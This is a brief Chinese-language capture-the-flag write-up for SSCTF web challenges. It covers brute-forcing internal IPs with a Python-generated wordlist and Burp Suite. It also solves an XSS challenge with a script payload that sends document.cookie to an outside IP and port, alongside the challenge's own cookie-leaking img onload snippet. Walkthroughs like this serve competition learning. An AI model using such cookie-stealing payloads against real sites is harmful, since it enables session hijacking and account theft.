这周两场比赛赶在了一起,ssctf没来的急打,现在补一下。
WEB
0x01 捡吗?
本题是道内网访问的题目少不了的就是内网扫描
首先生成字典
f = open('1.txt','w')
for i in range(255):
f.write(str(i)+'\n')利用burpsuit爆破
发现了网段中的可靠ip 190
后来等hint放出来
直接访问ftp这里用大写
弹幕
一道xss的题目,在网页刚开始刷新的时会出现一个弹框
里面的内容是
<img src="/static/images/welcome.gif" onload="c=encodeURIComponent(document.cookie);if(c.length>32){a=new Image();a.src='/xssHentai/request/1/?body='+c;}">
输入http://117.34.71.7/xssHentai/是个登录界面最简单的注入注进去
构造payload
<script>var img =new Image();img.src = "http://45.78.29.252:8888/?a="+document.cookie;document.getElementsByTagName("head")[0].appendChild(img);</script>发现中间如果是4不行如果是1可以接收到flag
